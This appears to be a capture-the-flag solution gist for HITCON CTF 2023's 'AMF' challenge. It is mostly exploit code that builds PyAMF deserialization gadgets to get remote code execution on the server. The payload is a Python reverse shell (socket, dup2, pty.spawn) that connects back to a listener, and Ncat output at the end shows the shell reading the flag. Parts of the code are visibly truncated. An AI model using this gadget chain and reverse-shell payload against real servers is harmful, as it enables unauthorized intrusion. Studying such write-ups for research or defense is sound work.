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Created September 10, 2023 01:34
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HITCON CTF 2023 Quals - AMF (Web/Misc)
import pyamf
from my_wsgi import WSGIGateway
NAMESPACE = "pyamf.remoting.amf3"
class RequestProcessor:
class __amf__:
static = ("gateway",)
def __init__(self):
# fake WSGIGateway instance that using cProfile.Profile() as service
self.gateway = WSGIGateway()
pyamf.register_package(globals(), package=NAMESPACE)
import pyamf
NAMESPACE = "cProfile"
class Profile:
class __amf__:
static = ("skip",)
def __init__(self):
self.skip = 1
pyamf.register_package(globals(), package=NAMESPACE)
import pyamf
from my_amf3 import RequestProcessor
from my_remoting import Envelope
NAMESPACE = "pip._vendor.distlib.database"
class DependencyGraph:
class __amf__:
static = ("adjacency_list", "repr_node")
def __init__(self):
# this is equivalent to: self.repr_node(self.adjacency_list.items()[0][0])
self.adjacency_list = Envelope()
self.repr_node = RequestProcessor()
pyamf.register_package(globals(), package=NAMESPACE)
import pyamf
from my_cprofile import Profile
NAMESPACE = "pyamf.remoting.gateway"
class ServiceWrapper:
class __amf__:
static = ("service", "preprocessor", "expose_request")
def __init__(self):
# fake Profile instance
self.service = Profile()
# some useless attributes just for avoiding error
self.preprocessor = None
self.expose_request = None
pyamf.register_package(globals(), package=NAMESPACE)
import pyamf
from pyamf.flex import messaging
NAMESPACE = "pyamf.remoting"
class Request:
class __amf__:
static = (
def __init__(self):
self.envelope = "x" # useless, just for avoiding error
self.body = [
# body=["open('./pwn','w').write('pwned')"],
'import os,pty,socket;s=socket.socket();s.connect(("",10784));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
class Envelope:
class __amf__:
static = ("bodies",)
def __init__(self):
# Envelope.items() will return self.bodies
# send fake Request to RequestProcessor
self.bodies = [[Request(), "b"]]
pyamf.register_package(globals(), package=NAMESPACE)
import pyamf
NAMESPACE = "pyamf.remoting.amf3"
class RequestProcessor:
class __amf__:
static = ("service",)
def __init__(self, service):
self.service = service
pyamf.register_package(globals(), package=NAMESPACE)
import pyamf
from my_gw import ServiceWrapper
NAMESPACE = "pyamf.remoting.gateway.wsgi"
class WSGIGateway:
class __amf__:
static = ("services", "preprocessor", "expose_request")
def __init__(self):
# ServiceWrapper that using cProfile.Profile() as service = {"rce": ServiceWrapper()}
# some useless attributes just for avoiding error
self.preprocessor = None
self.expose_request = None
pyamf.register_package(globals(), package=NAMESPACE)
import uuid
import pyamf
import requests
from pyamf import remoting
from pyamf.flex import messaging
from my_db import DependencyGraph
server_url = "http://localhost:1337/gateway/"
server_url = ""
# when operation causing error, the server will try to call DependencyGraph.__repr__ to print the error message
list_msg = messaging.RemotingMessage(
# when target is "null", the server will treat the request as amf3 request
# somehow Py3AMF doesn't check the authenticator when processing amf3 request
list_req = remoting.Request(target="null", body=[list_msg])
list_env = remoting.Envelope(pyamf.AMF3)
list_env["/0"] = list_req
list_bin_msg = remoting.encode(list_env)
list_resp =
server_url, data=list_bin_msg.getvalue(), headers={"Content-Type": "application/x-amf"}
list_resp_msg = remoting.decode(list_resp.content)
# Ncat: Version 7.93 ( )
# Ncat: Listening on :::31337
# Ncat: Listening on
# Ncat: Connection from ::1.
# Ncat: Connection from ::1:55180
# $ /readflag give me the flag
# /readflag give me the flag
# hitcon{ancient protocols are always funnnn}
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